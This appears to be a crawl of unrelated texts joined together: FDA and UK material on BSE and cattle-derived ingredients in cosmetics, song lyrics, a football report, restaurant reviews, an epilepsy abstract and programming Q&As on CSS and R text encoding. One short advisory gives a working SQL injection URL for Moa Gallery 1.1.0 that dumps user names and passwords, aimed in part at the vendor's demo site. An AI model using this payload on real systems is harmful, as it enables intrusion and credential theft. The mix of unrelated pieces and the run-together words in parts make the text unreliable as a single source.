State of Washington, FDA published the IFR requiring that specified risk materials (SRMs), small intestine of all cattle, tissue from nonambulatory disabled cattle, tissue from cattle not inspected and passed for human consumption, and mechanically separated beef (MS beef) not be used for FDA-regulated human food and cosmetics.\1\ SRMs include the brain, skull, eyes, trigeminal ganglia, spinal cord, vertebral column (excluding the vertebrae of the tail, the transverse process of the thoracic and lumbar vertebrae, and the wings of the sacrum), and dorsal root ganglia of cattle 30 months and older, as well as the tonsils and distal ileum of the small intestine of all cattle.--------------------------------------------------------------------------- \1\ In June 2005, USDA confirmed the second case of BSE in the United States in a cow born in Texas.--------------------------------------------------------------------------- The U.S. Department of Agriculture (USDA) also published an IFR (69 FR 1862, January 12, 2004) to prohibit certain cattle material from use in human food. FDA's IFR extended the protection from BSE provided under USDA's BSE IFR to FDA-regulated human food and cosmetics. On September 7, 2005, both FDA (70 FR 53063) and USDA (70 FR 53043) published amendments to their respective IFRs to allow the use of small intestine in human food and cosmetics provided the distal ileum has been removed. This final rule on recordkeeping will help ensure compliance with the provisions of FDA's IFR and, thereby, will serve as an additional safeguard to reduce human exposure to the agent that causes BSE that may be present in human food and cosmetics that are manufactured from, processed with, or otherwise contain, material from cattle. FDA believes that these recordkeeping requirements are necessary for manufacturers and processors to ensure that all cattle material they use is free from prohibited cattle materials. Furthermore, these requirements are necessary for FDA to ensure compliance with the provisions of the IFR. There is currently no validated premortem test to reliably detect the presence of the BSE agent or the presence of prohibited cattle material in human food and cosmetics. Once cattle material such as brain or spinal cord is separated from the source animal, it may not be possible to determine the age of the animal from which the material came without records and, therefore, whether the material is an SRM. In addition, without records, it may not be possible to determine whether a product contains material from cattle that were not inspected and passed for human consumption. Also, a product might contain MS beef without its presence being evident from the appearance of the product. FDA received 32 responses, each containing one or more comments, from industry, consumers, and other stakeholder groups in response to the proposed rule. We have responded in this document to the comments that were within the scope of this rulemaking. We received several comments that pertained to the prohibitions on the cattle materials themselves, as opposed to the recordkeeping requirements, and other issues that are covered in the IFR. We will be responding to those comments when we finalize the IFR. To prevent the spread of variant Creutzfeldt-Jakob disease the Health, Labor and Welfare Ministry decided Wednesday to ban blood donations by people who have received injections of human placenta extract, the ministry said. Variant Creutzfeldt-Jakob disease is believed to be caused when humans are infected with bovine spongiform encephalopathy. The extract is often injected in beauty treatment because it is believed to have a whitening effect on skin tone and boosts the metabolism. "Although the risk of infection is said to be low, we made the decision because the risk can't be completely ruled out," a ministry official said. The policy was endorsed by the research panel of a subcommittee on blood administration under the ministry's Pharmaceutical Affairs and Food Sanitation Council and comes into effect in October at the earliest. The policy will prompt the Japanese Red Cross Society to ask prospective blood donors whether they have been injected with placenta extract and raise awareness by displaying a poster. It is unclear whether placenta contains abnormal prions, which is said to be the variant CJD agent, and there has been no report of any variant CJD infection in humans through placenta extract injection. (Aug. 25, 2006) http://www.yomiuri.co.jp/dy/national/20060825TDY03001.htm Part No : 1227Description : Hask Placenta Treat.Vial 24/unit This product is in stock, and will ships in one to two business day.If the order is received before 1:00 pm Pacific Time, usually ships onsame business day. http://www.beautycentury.com/mall/stockIS.asp?sku=1227 HASK PLACENTA products are leaders in the Deep Conditioner segment ofHair Care.Henna-n-Placenta Pacs are #13 in Unit Sales of ALL conditioners and #1of all DEEP conditioners inthe Drug Class*. Hask Placenta Instant Hair Repair, with No-Rinsetreatment, is a top-10 unit seller*.National Media Support drives the brand and Hasks strong professionalheritage has consumer recognition. http://www.ecrm-epps.com/Expose/V4_7/Table_Profiles/Alleghany.html Use of Bovine offal in Cosmetics; http://www.bseinquiry.gov.uk/files/yb/1990/02/01004001.pdf http://www.bseinquiry.gov.uk/files/yb/1990/02/01007001.pdf http://www.bseinquiry.gov.uk/files/yb/1990/01/26018001.pdf http://www.bseinquiry.gov.uk/files/yb/1990/01/29001001.pdf http://www.bseinquiry.gov.uk/files/yb/1990/01/29015001.pdf http://www.bseinquiry.gov.uk/files/yb/1990/01/31014001.pdf ***(Third paragraph: The wording of this paragraphwill raise NEW concerns which cannot bescientifically answered. We would ask thatthe third paragraph be OMITTED.) http://www.bseinquiry.gov.uk/files/yb/1991/06/00005001.pdf http://www.bseinquiry.gov.uk/files/yb/1991/07/25003001.pdf (there may still be some strange products administered by injection that are trying to_evade_ the Medicines Act by calling themselvescosmetics. If _any_ of those involve bovineingredients, they need to _comply_ with theCSM guidelines)... http://www.bseinquiry.gov.uk/files/yb/1991/06/26003001.pdf http://www.bseinquiry.gov.uk/files/yb/1991/06/30001001.pdf http://www.bseinquiry.gov.uk/files/yb/1991/10/15002001.pdf http://www.bseinquiry.gov.uk/files/yb/1991/10/31009001.pdf BSE110/1 0180RUMINANT-DERIVED MATERIAL IN COSMETICS The Department of Health wishes to reinforce the advice given to theCosmetics Industry in February 1990 (ref.)It is possible that some ruminant-derivedmaterials are being incorporated intocosmetics or beauty treatments which arethen marketed as 'naturalproducts.The particular materials that should notunder _ANY_ circumstances be used in themanufacturer of cosmetics or beauty treatmentsare:1. bovine (cattle)-derived offals, or proteinsderived from these offals. These offals are:brain, spinal cord, spleen, thymus, tonsils,intestines of Bovine offal (prohibition)regulations2. ovine (sheep)-derived offals and ovine placenta.In view of the current uncertainty about theincidence of infection with spongiformencephalopathy agents it is probably advisablethat these recommendations apply to the aboveruminant-derived materials of ANY COUNTRY OF ORIGIN...31 October 199191/10.31/9.1It also emerged from the 16- volumereport of Lord Phillips, released onThursday, that people who bought anti-agingcream may have exposed themselves to BSE unwittingly.The report describes their use as a potentialpathway to infection because some creams may haveincluded cattle brain placenta. HHS Secretary Tommy G. Thompson today announced several new public healthmeasures, to be implemented by the Food and Drug Administration (FDA), tostrengthen significantly the multiple existing firewalls that protectAmericans from exposure to the agent thought to cause bovine spongiformencephalopathy (BSE, also known as mad cow disease) and that help preventthe spread of BSE in U.S. cattle.The existing multiple firewalls, developed by both the U.S. Department ofAgriculture (USDA) and HHS, have been extremely effective in protecting theAmerican consumer from exposure to BSE. The first firewall is based onimport controls started in 1989. A second firewall is surveillance of theU.S. cattle population for the presence of BSE, a USDA firewall that led tothe finding of the BSE cow in December. The third firewall is FDA's 1997animal feed ban, which is the critical safeguard to help prevent the spreadof BSE through cattle herds by prohibiting the feeding of most mammalianprotein to ruminant animals, including cattle. The fourth firewall, recentlyannounced by USDA, makes sure that no bovine tissues known to be at highrisk for carrying the agent of BSE enter the human food supply regulated byUSDA. The fifth firewall is effective response planning to contain thepotential for any damage from a BSE positive animal, if one is discovered.This contingency response plan, which had been developed over the pastseveral years, was initiated immediately upon the discovery of a BSEpositive cow in Washington State December 23.The new safeguards being announced today are science-based and furtherbolster these already effective safeguards.Specifically, HHS intends to ban from human food (including dietarysupplements), and cosmetics a wide range of bovine-derived material so thatthe same safeguards that protect Americans from exposure to the agent of BSEthrough meat products regulated by USDA also apply to food products that FDAregulates.FDA will also prohibit certain currently allowed feeding and manufacturingpractices involving feed for cattle and other ruminant animals. Theseadditional measures will further strengthen FDA's 1997 "animal feed" rule."Today's actions will make strong public health protections against BSE evenstronger," Secretary Thompson said. "Although the current animal feed ruleprovides a strong barrier against the further spread of BSE, we must neverbe satisfied with the status quo where the health and safety of our animalsand our population is at stake. The science and our own experience andknowledge in this area are constantly evolving. Small as the risk mayalready be, this is the time to make sure the public is protected to thegreatest extent possible.""Today we are bolstering our BSE firewalls to protect the public," said FDACommissioner Mark B. McClellan, M.D., Ph.D. "We are further strengtheningour animal feed rule, and we are taking additional steps to further protectthe public from being exposed to any potentially risky materials fromcattle. FDA's vigorous inspection and enforcement program has helped usachieve a compliance rate of more than 99 percent with the feed ban rule,and we intend to increase our enforcement efforts to assure compliance withour enhanced regulations. Finally, we are continuing to assist in thedevelopment of new technologies that will help us in the future improve evenfurther these BSE protections. With today's actions, FDA will be doing morethan ever before to protect the public against BSE by eliminating additionalpotential sources of BSE exposure."To implement these new protections, FDA will publish two interim final rulesthat will take effect immediately upon publication, although there will bean opportunity for public comment after publication.The first interim final rule will ban the following materials fromFDA-regulated human food, (including dietary supplements) and cosmetics:* Any material from "downer" cattle. ("Downer" cattle are animals thatcannot walk.)* Any material from "dead" cattle. ("Dead" cattle are cattle that die on thefarm (i.e. before reaching the slaughter plant);* Specified Risk Materials (SRMs) that are known to harbor the highestconcentrations of the infectious agent for BSE, such as the brain, skull,eyes, and spinal cord of cattle 30 months or older, and a portion of thesmall intestine and tonsils from all cattle, regardless of their age orhealth; and* The product known as mechanically separated beef, a product which maycontain SRMs. Meat obtained by Advanced Meat Recovery (an automated systemfor cutting meat from bones), may be used since USDA regulations do notallow the presence of SRMs in this product.The second interim final rule is designed to lower even further the riskthat cattle will be purposefully or inadvertently fed prohibited protein. Itwas the feeding of such protein to cattle that was the route of diseasetransmission that led to the BSE epidemic in United Kingdom cattle in the1980's and 1990's.This interim final rule will implement four specific changes in FDA'spresent animal feed rule. First, the rule will eliminate the presentexemption in the feed rule that allows mammalian blood and blood products tobe fed to other ruminants as a protein source. Recent scientific evidencesuggests that blood can carry some infectivity for BSE.Second, the rule will also ban the use of "poultry litter" as a feedingredient for ruminant animals. Poultry litter consists of bedding, spilledfeed, feathers, and fecal matter that are collected from living quarterswhere poultry is raised. This material is then used in cattle feed in someareas of the country where cattle and large poultry raising operations arelocated near each other. Poultry feed may legally contain protein that isprohibited in ruminant feed, such as bovine meat and bone meal. The concernis that spillage of poultry feed in the chicken house occurs and thatpoultry feed (which may contain protein prohibited in ruminant feed) is thencollected as part of the "poultry litter" and added to ruminant feed.Third, the rule will ban the use of "plate waste" as a feed ingredient forruminants. Plate waste consists of uneaten meat and other meat scraps thatare currently collected from some large restaurant operations and renderedinto meat and bone meal for animal feed. The use of "plate waste" confoundsFDA's ability to analyze ruminant feeds for the presence of prohibitedproteins, compromising the Agency's ability to fully enforce the animal feedrule.Fourth, the rule will further minimize the possibility ofcross-contamination of ruminant and non-ruminant animal feed by requiringequipment, facilities or production lines to be dedicated to non-ruminantanimal feeds if they use protein that is prohibited in ruminant feed.Currently, some equipment, facilities and production lines process or handleprohibited and non-prohibited materials and make both ruminant andnon-ruminant feed -- a practice which could lead to cross-contamination.To accompany these new measures designed to provide a further layer ofprotection against BSE, FDA will in 2004 step up its inspections of feedmills and renderers. FDA will itself conduct 2,800 inspections and will makeits resources go even further by continuing to work with state agencies tofund 3,100 contract inspections of feed mill and renderers and other firmsthat handle animal feed and feed ingredients. Through partnerships withstates, FDA will also receive data on 700 additional inspections, for atotal of 3,800 state contract and partnership inspections in 2004 alone,including annual inspections of 100 percent of all known renderers and feedmills that process products containing materials prohibited in ruminantfeed."We have worked hard with the rendering and animal feed productionindustries to try and achieve full compliance with the animal feed rule,"said Dr. McClellan, "and through strong education and a vigorous enforcementcampaign, backed by additional inspections and resources, we intend tomaintain a high level of compliance."Dr. McClellan also noted that, in response to finding a BSE positive cow inWashington state December 23, FDA inspected and traced products at 22facilities related to that positive cow or products from the cow, includingfeed mills, farms, dairy farms, calf feeder lots, slaughter houses, meatprocessors, transfer stations, and shipping terminals. Moreover, FDA hasconducted inspections at the rendering facilities that handled materialsfrom the positive cow, and they were found to be fully in compliance withFDA's feed rule.To further strengthen protections for Americans, FDA/HHS intends to workwith Congress to consider proposals to assure that these importantprotective measures will be implemented as effectively as possible.FDA is also continuing its efforts to assist in the development of betterBSE science, to achieve the same or greater confidence in BSE protection ata lower cost. For example, to enhance the ability of our public healthsystem to detect prohibited materials in animal feed, FDA will continue tosupport the development and evaluation of diagnostic tests to identifyprohibited materials. These tests would offer a quick and reliable method oftesting animal feeds for prohibited materials and for testing other productsfor contamination with the agent thought to cause BSE.FDA has publicly discussed many of the measures being announced today withstakeholders in workshops, videoconferences, and public meetings. Inaddition, FDA published an Advance Notice of Proposed Rulemaking in November2002 (available online at http://www.fda.gov/OHRMS/DOCKETS/98fr/110602c.htm concerning possible changes to the animal feed rule.Comprehensive information about FDA's work on BSE and links to other relatedwebsites are available at
====================================================================== [»] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln [»] Language : php [»] Download : http://sourceforge.net/projects/moagallery/ [»] Script site : http://www.moagallery.net/ [»] Founder: Mr.tro0oqy <- from Yemen [»] Gr44tz to: [H]-> borken heart :( [»] E-mail : t.4@windowslive.com ====================================================================== exploit: -------- http://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users-- -------- demo: -------- http://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--
Once I throw on this, once I throw on this It's over girl Once I throw on this, once I throw on this It's over girl. I hear you knock knock knock baby come on up I hope you got got got something in yo' cup Cause I'm three shots deep and I aint tryna sleep Get your redbull on cause I'm ready You've been playin hard to get with me all night We both know exactly what you want right Don't tell me what you won't do Tell me what you gon' do whatchu gon' do Once I throw on this bowchickawowwow Whatchu gonna say You act like you gon leave But I know you gon' stay Break it down dicky downdown Girl don't even play Once I set the mood right Ima make sound like Ima make you sound like Are you tryna make me late wait wait till the second date But I can't can't can't even comtemplate Waiting one more minute lemme jump in it I brought chu flowers and a teddy You've been playin hard to get with me all night We both know exactly what you want right Don't tell me what you won't do Tell me what you gon' do whatchu gon' do Once I throw on this bowchickawowwow Whatchu gonna say You act like you gon leave But I know you gon' stay Break it down dicky downdown Girl don't even play Once I set the mood right Ima make you sound like Yeah I can make you sound like Now I aint even gotta say shit To make you feel alive girl you know you like that Owohowohowowoh Say I aint even gotta say shit To make you feel alive girl you know you like that Owohowohowowoh Once I throw on this bowchickawowwow Whatchu gonna say You act like you gon leave But I know you gon' stay Break it down dicky downdown Girl don't even play Once I set the mood right Ima make you sound like Yeah ima ima make ya Once I throw on this, once I throw on this It's over girl Once I throw on this, once I throw on this It's over girl Lyrics taken from http://www.lyricsmode.com/lyrics/m/mike_posner/bow_chicka_wow_wow.html Click "Correct" to open the "Correction form". There you can add structure tags, correct typos or add missing words. Send your correction and get karma points! Result of your work will appear after moderating. hotlyrics songmeanings Write about your feelings and thoughts Know what this song is about? Does it mean anything special hidden between the lines to you? Share your meaning with community, make it interesting and valuable. Make sure you've read our simple tips Hey! It's useful. If this song really means something special to you, describe your feelings and thoughts. Don't hesitate to explain what songwriters and singer wanted to say. Also we collected some tips and tricks for you: Don't write just "I love this song." Hidden between the lines, words and thoughts sometimes hold many different not yet explained meanings This page is missing some information about the song. Please expand it to include this information. You can help by uploading artist's image, adding song structure elements, writing song meaning or creating lyrics explanation.
Limitations of monotherapy trials in epilepsy. Monotherapy is considered optimal management for most patients with epilepsy, but designing monotherapy trials in epilepsy has proved to be a complex endeavor. Consideration of the validity of evidence for efficacy, potential risks to patients, clinical applicability of results, and effects of dosing and titration rates on efficacy and tolerability creates unique challenges. This article reviews pertinent aspects of trials of conversion to monotherapy in refractory patients and equivalence trials in newly diagnosed patients to better understand their limitations. Despite the inherent difficulties in designing monotherapy trials in epilepsy, previous monotherapy studies have provided important information for clinical management with new treatments.
“I think it’s a very good result, Swansea are a good team at home, they’re very strong,” Pellegrini said. “The way we won today is very important to us. “I think that we had a really good first-half. We had control of the ball against a team where it’s difficult to have a lot of possession." ...Manuel Pellegrini... “When we lost the away games earlier in the season we played in the same way. We conceded easy goals and we didn’t get the results. It’s not easy to play away – everyone always wants to play at home. “It’s very important to be at the top of the table but there are more games to play and, as I’ve always said, at the end of the league I think there will be four or five teams fighting for the title.” In particular, City’s second half performance pleased the 60-year old, though he was disappointed with the officials for not ruling out Bony’s first-half equaliser for offside. “Their goal at the end of the first-half was offside and they grew with that goal,” Manuel argued. “But my team kept trying to score the second goal and the third goal which is really good. “It was a pity that they scored at the end. They scored right at the end which made the scoreline a little bit closer that it should have been but I repeat, Swansea are a very good team.” Ivorian midfielder Yaya Toure was instrumental in the victory, scoring his twelfth goal of the season to put City back in front after Bony’s equaliser. The African Footballer of the Year became the first City central midfielder to score ten Premier League goals in a season but he was quick to deflect the praise and pay tribute to his teammates and the opposition after the game. “It was the perfect start to the year, we played against a good side who created a lot of problems but we did a fantastic job,” Toure smiled. “The second goal was quite key, we played really well. We prepared realy well and we got our reward. “Swansea are a good side but I think we deserved the win. “I’m working hard and trying to help my teammates – I think today I was a little bit lucky but I am happy to be scoring goals." ...Yaya Toure... “We continue to fight until the end – for the team and the club, we want to win this trophy and if we can play really well like we did today we’ll be really happy at the end of the season.” Pellegrini’s Swansea counterpart Michael Laudrup was pleased with his team’s first-half performance but was disappointed with some of the defending that led to City’s goals. “First half we were excellent, of course conceding three goals against a top team like City makes it tough to win,” Laudrup stated. “I think we had more chances than them, the second goal got a big deflection off Ashley Williams but the third goal really hurt us when we trying to get back in the game. “For me, it was a really soft goal to concede so I was very disappointed with that. “Being the third game in six days it was tough – we got the second goal but it was too late.”
"Business runs in real time, and workers want to do things fast. The iPhone 5's LTE can provide that real-time capability," said SAP CIO Oliver Bussmann. "The future is a mobile one, and we're constantly looking at any desktop app that we can move to mobile." Bussmann said he supports more than 60,000 workers globally and manages more than 40,000 smartphones and tablets. Around 13,000 of the smartphones are iPhones. Like many large corporations, SAP negotiates flat data rates with carriers, Bussmann said. Alex Yoyn, assistant director of technology for West Virginia University, said some of the college's 30,000 students have expressed interest in the iPhone 5. But the main campus in Morgantown, W.Va., doesn't have LTE service, which diminishes the new device's appeal. While some CIOs seem unconcerned, some analysts cautioned that the new iPhone could cause problems for businesses. For example, Rob Enderle, an analyst at Enderle Group, said the ease of sharing photos with the new device could lead to pictures of unannounced products "[finding] their way out of the company more frequently." This version of this story was originally published in Computerworld's print edition. It was adapted from an article that appeared earlier on Computerworld.com.
Dining Treasures in Savannah Share: Dining Treasures in Savannah So, I've been visiting Savannah for a conference. I turned to this list to find some recommendations and scored 100%. Thanks. Day 1 at Alligator Soul on Barnard. Outstanding. In our party, people had the steak, the lamb chops, the scallops and the crab cakes. ALL were spectacular. The curried pumpkin soup appetizer was brilliant. Day 2: a.lure -- a bit noisy, trying to create a vibe. Food was amazing. I had the grilled marlin with grilled asparagus. The pan-fried scallop appetizer was also just delicious. Those were both daily specials. Others enjoyed menu items just as much. The mocha creme brulee was more like a mousse, but was absolutely delicious. The sorbet trio was also outstanding with highly original and flavourful combinations (prickly pear and lemongrass!) Day 3: Local11ten. It's a little tougher to get to if you're staying downtown without a car (as we were). However, the walk on Bull St. is lovely and takes you through Forsythe park. We had a fabulous dinner! I had the artisan greens salad to start, others had gazpacho and mixed green salad. All were original and delicious. Mains included the pekin duck (not Peking!) which as not fatty or heavy. The skin was crisp, the sauce perfect. Scallops on a bed of black rice, which got rave reviews all round and the Atlantic Shrimp with grits -- also just delicious. Our desserts included the chocolate torte (very good), the strawberry-rhubarb pie, which had basil in it making a delicious but unusual taste, and the creme brulee, which might be the best one I've ever tasted. Tomorrow our last meal in Savannah is brunch. We're going to Soho South Cafe. Hope it's as good as the dinners have been. Recommended From Chowhound Avocados are packed with antioxidants, healthy fats, vitamins and minerals. But have you ever noticed those weird strings?! Sometimes the flesh is a darker brown color, making them easier to see. (01:22) Easy Crab Cakes Crab cakes are so often disappointing -- mushy or gummy, full of starchy filler. But these easy cakes are full of beautiful lump crabmeat, and a light panko coating ensures they fry up crispy and golden brown. Bright, lemony aioli makes a piquant counterpart to the sweet, sweet crab. Read more.
Q: Insert image to DOM resized to 50% of its width/height So I am trying to insert an image to a page with JavaScript with 50% of its width and 50% of its height. I do this: someElement.html('<img src="/path/to/img.jpg" alt="" class="sImg" />'); The sImg class is defined in stylesheet like this: .sImg{ border: 0; width: 50%; height: 50%; } Yet the image appears fullsize. I have also checked via Firebug and the image has width and height both at 50%. A: First of all, if you're setting a width and height, you should also include display: block; since inline elements don't generally enjoy being given a set height. But more importantly, when you express a width (or height) as a percentage, that's a percentage of the parent element, so if the parent is 1000px wide, the image will be 500px wide (regardless of what size the actual image file is). If you're using JavaScript to determine the current image size and change it, just express the new size in px instead of %. A: The CSS you've got means that the width and height should be computed as half the size of the parent container, not the image itself. What you can do is something like this: create an Image object and give it an "onload" handler. The handler can get reliable size information (because the image will have been loaded), and can then add the image element with the proper size. var img = new Image(); img.onload = function() { $(someElement).empty().append($('<img/>', { src: img.src, alt: '', 'class': 'sImg', css: { width: Math.floor(img.width / 2) + 'px', height: Math.floor(img.height / 2) + 'px', display: 'inline-block' } // display should be set as you need it }); }; img.src = yourUrl; edit — the eerily knowledgeable Šime Vidas points out that setting the "width" or "height" attribute should make the right thing happen, with the size being reduced appropriately to maintain the aspect ratio.
TTDI Residents’ Association chairman Abdul Hafiz Abu Bakar. ― Picture by Choo Choy May KUALA LUMPUR, Dec 19 — Groups opposing a condominium project near Taman Rimba Kiara said they showed Datuk Seri Tengku Adnan Mansor evidence the development would harm the park, after the minister reiterated his denial today. The groups also disputed the Federal Territories minister’s description of the park as only being 13 acres large, again insisting that they demonstrated this to Tengku Adnan before. Recalling a town hall meeting on November 3, they said the minister was shown that the offending project would occupy nearly half of Taman Rimba Kiara, which was earmarked as a green lung in both the gazetted Kuala Lumpur Structure Plan 2020 and the Draft City Plan 2020. “It was (also) highlighted to the minister that there is ample evidence showing that the original footprint of Taman Rimba Kiara is 25 acres and not 13 acres. “After being shown the evidence, the minister kindly offered to meet and discuss the matter at his office. However, our email seeking an appointment remains unanswered until today,” the groups said in a statement. The groups conceded that the Draft City Plan was not gazetted, but said it should still be adopted given the sum spent to develop it. The minister said in a statement earlier today that Taman Rimba Kiara was not gazetted as a public park and that the project would not encroach on its 13 acres. He also distinguished Taman Rimba Kiara from the Large Scale Public Park (TABB) of Bukit Kiara gazetted on April 3, 2013 under the care of the National Landscape Department, Urban Wellbeing, Housing and Local Government Ministry. On August 11, TTDI Residents’ Association chairman Abdul Hafiz Abu Bakar, the management bodies of five condominiums and four other TTDI residents filed for judicial review against Kuala Lumpur City Hall and its mayor over the approval of the condominium project.
Q: How to detemine the coding of accents? This question is related to this previous one on how to replace accented strings like México with equivalent Latex code M\'{e}xico. My problem here is slightly different. I am using a third party database with string variables with Spanish accents like above. However, the encoding appears odd since this is the behavior I get: > grep("México",temp$dest_nom_ent) integer(0) > grep("Mexico",temp$dest_nom_ent) integer(0) > grep("xico",temp$dest_nom_ent) [1] 18 19 20 > temp$dest_nom_ent[grep("xico",temp$dest_nom_ent)] [2] "México" "México" "México" where temp$dest_nom_ent is a variable with state names of México. My question, then, is how to convert the string variable from the third party database into an encoding that standard R functions will recognize. Please note: > Encoding(temp$dest_nom_ent) [1] "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" [8] "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" [15] "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" [22] "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" [29] "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" [36] "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" [43] "unknown" "unknown" For further info I am using Windows 7 64. Also note: > charToRaw(temp$dest_nom_ent[18]) [1] 4d e9 78 69 63 6f Which from this source coincides with Windows Spanish (Traditional Sort) locale. M=4d é=e9 x=78 i=69 c=63 o=6f And also note: > charToRaw("México") [1] 4d c3 a9 78 69 63 6f > Encoding("México") [1] "latin1" I have tried the following unsuccessfully (e.g. meaning grep("é",temp$dest_nom_ent) returns null vector): Encoding(temp$dest_nom_ent)<-"latin1" temp$dest_nom_ent <- iconv(temp$dest_nom_ent,"","latin1") temp$dest_nom_ent <- enc2utf8(temp$dest_nom_ent) ... I checked supported character sets using iconvlist() and "WINDOWS-1252" is supported. The following, however, did not work: > temp1 <- temp$dest_nom_ent[grep("xico",temp$dest_nom_ent)] > temp1 [1] "México" "México" "México" > Encoding(temp1)<-"WINDOWS-1252" > temp1 <- iconv(temp1,"WINDOWS-1252","latin1") > temp1 [1] "México" "México" "México" > Encoding(temp1) [1] "latin1" "latin1" "latin1" > charToRaw(temp1[1]) [1] 4d e9 78 69 63 6f > grep("é",temp1) integer(0) which compares to: > temp2 <- c("México","México","México") > temp2 [1] "México" "México" "México" > Encoding(temp2) [1] "latin1" "latin1" "latin1" > charToRaw(temp2[1]) [1] 4d c3 a9 78 69 63 6f > grep("é",temp2) [1] 1 2 3) Tried to find out the encoding by brute force like: try(for(i in 1:length(iconvlist())){ temp1 <- temp$dest_nom_ent[grep("xico",temp$dest_nom_ent)] Encoding(temp1)<-iconvlist()[i] temp1 <- iconv(temp1,iconvlist()[i],"latin1") print(grep("é",temp1)) print(i) },silent=FALSE) I am not familiar with try function but it still scapes at error instead of ignoring it so cannot check whole list: ... [1] 17 integer(0) [1] 18 integer(0) [1] 19 integer(0) [1] 20 Error in iconv(temp1, iconvlist()[i], "latin1") : unsupported conversion from 'CP-GR' to 'latin1' in codepage 1252 Finally: > Sys.getlocale() [1] "LC_COLLATE=English_United States.1252;LC_CTYPE=English_United States.1252;LC_MONETARY=English_United States.1252;LC_NUMERIC=C;LC_TIME=English_United States.1252" > d<-c("México","México") > for(i in 1:7){d1 <- str_sub(d[1],i,i); print(d1)} [1] "M" [1] "Ã" [1] "© [1] "x" [1] "i" [1] "c" [1] "o" > print(grep("é",d)) [1] 1 2 So it seems I will have to change the computer's locale as suggested here. Also see here PS: In case you wonder how with an English_United States.1252 locale I managed to type d<-c("México","México") the way is by setting up a secondary Spanish keyboard (traditional sort) using Control Panel > Clock, Language and Region > Region and Language > Keyboards and Languages > Change Keyboards and under installed services click add and navigate to Spanish traditional sort. Then under advanced key settings you can create a short-cut to switch keyboards. In my case Shit+Alt. So if I want to type ñ in English default locale, I do Shift+Alt followed by ; and then Shift+Alt to go back to English keyboard. A: Well, I could not determine the coding of accents but the following accomplishes what I wanted. The trick was to convert to UTF-8, set the sub() option useBytes=TRUE and Joran's suggestion to use sanitize.text.function=function(x){x} for xtable(). Here is the sample code. Easy to loop over all accented vowels: > temp1 <- unique(temp$dest_nom_ent) > temp1 [1] "Aguascalientes" "Baja California" [3] "Baja California Sur" "Campeche" [5] "Coahuila de Zaragoza" "Colima" [7] "Chiapas" "Guanajuato" [9] "Guerrero" "Hidalgo" [11] "Jalisco" "México" [13] "Michoacán de Ocampo" "Morelos" [15] "Nayarit" "Oaxaca" [17] "Puebla" "Querétaro" [19] "Quintana Roo" "San Luis Potosí" [21] "Sinaloa" "Tabasco" [23] "Tlaxcala" "Veracruz de Ignacio de la Llave" [25] "Zacatecas" > temp1 <- iconv(unique(temp1),"","UTF-8") > temp1 [1] "Aguascalientes" "Baja California" [3] "Baja California Sur" "Campeche" [5] "Coahuila de Zaragoza" "Colima" [7] "Chiapas" "Guanajuato" [9] "Guerrero" "Hidalgo" [11] "Jalisco" "México" [13] "Michoacán de Ocampo" "Morelos" [15] "Nayarit" "Oaxaca" [17] "Puebla" "Querétaro" [19] "Quintana Roo" "San Luis Potosí" [21] "Sinaloa" "Tabasco" [23] "Tlaxcala" "Veracruz de Ignacio de la Llave" [25] "Zacatecas" > Encoding(temp1) [1] "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" "unknown" [8] "unknown" "unknown" "unknown" "unknown" "UTF-8" "UTF-8" "unknown" [15] "unknown" "unknown" "unknown" "UTF-8" "unknown" "UTF-8" "unknown" [22] "unknown" "unknown" "unknown" "unknown" > temp2 <- sub("é", "\\\\'{e}", temp1, useBytes = TRUE) > temp2 <- data.frame(temp2) > print(xtable(temp2),sanitize.text.function=function(x){x}) % latex table generated in R 2.13.1 by xtable 1.5-6 package % Fri Jul 15 13:52:44 2011 \begin{table}[ht] \begin{center} \begin{tabular}{rl} \hline & temp2 \\ \hline 1 & Aguascalientes \\ 2 & Baja California \\ 3 & Baja California Sur \\ 4 & Campeche \\ 5 & Coahuila de Zaragoza \\ 6 & Colima \\ 7 & Chiapas \\ 8 & Guanajuato \\ 9 & Guerrero \\ 10 & Hidalgo \\ 11 & Jalisco \\ 12 & M\'{e}xico \\ 13 & Michoacán de Ocampo \\ 14 & Morelos \\ 15 & Nayarit \\ 16 & Oaxaca \\ 17 & Puebla \\ 18 & Quer\'{e}taro \\ 19 & Quintana Roo \\ 20 & San Luis Potosí \\ 21 & Sinaloa \\ 22 & Tabasco \\ 23 & Tlaxcala \\ 24 & Veracruz de Ignacio de la Llave \\ 25 & Zacatecas \\ \hline \end{tabular} \end{center} \end{table} As actually implemented in a loop: temp$dest_nom_ent <- iconv( temp$dest_nom_ent,"","UTF-8") temp$dest_nom_mun <- iconv( temp$dest_nom_mun,"","UTF-8") accents <-c("á","é","í","ó","ú") latex <-c("\\\\'{a}","\\\\'{e}","\\\\'{i}","\\\\'{o}","\\\\'{u}") for(i in 1:5){ temp$dest_nom_ent<-sub(accents[i], latex[i], temp$dest_nom_ent, useBytes = TRUE) temp$dest_nom_mun<-sub(accents[i], latex[i], temp$dest_nom_ent, useBytes = TRUE) } capture.output( print(xtable(temp),sanitize.text.function=function(x){x}), file = "../paper/rTables.tex", append = FALSE) Still, the answer is incomplete in that I cannot explain what exactly was going on. Found it through trial and error.
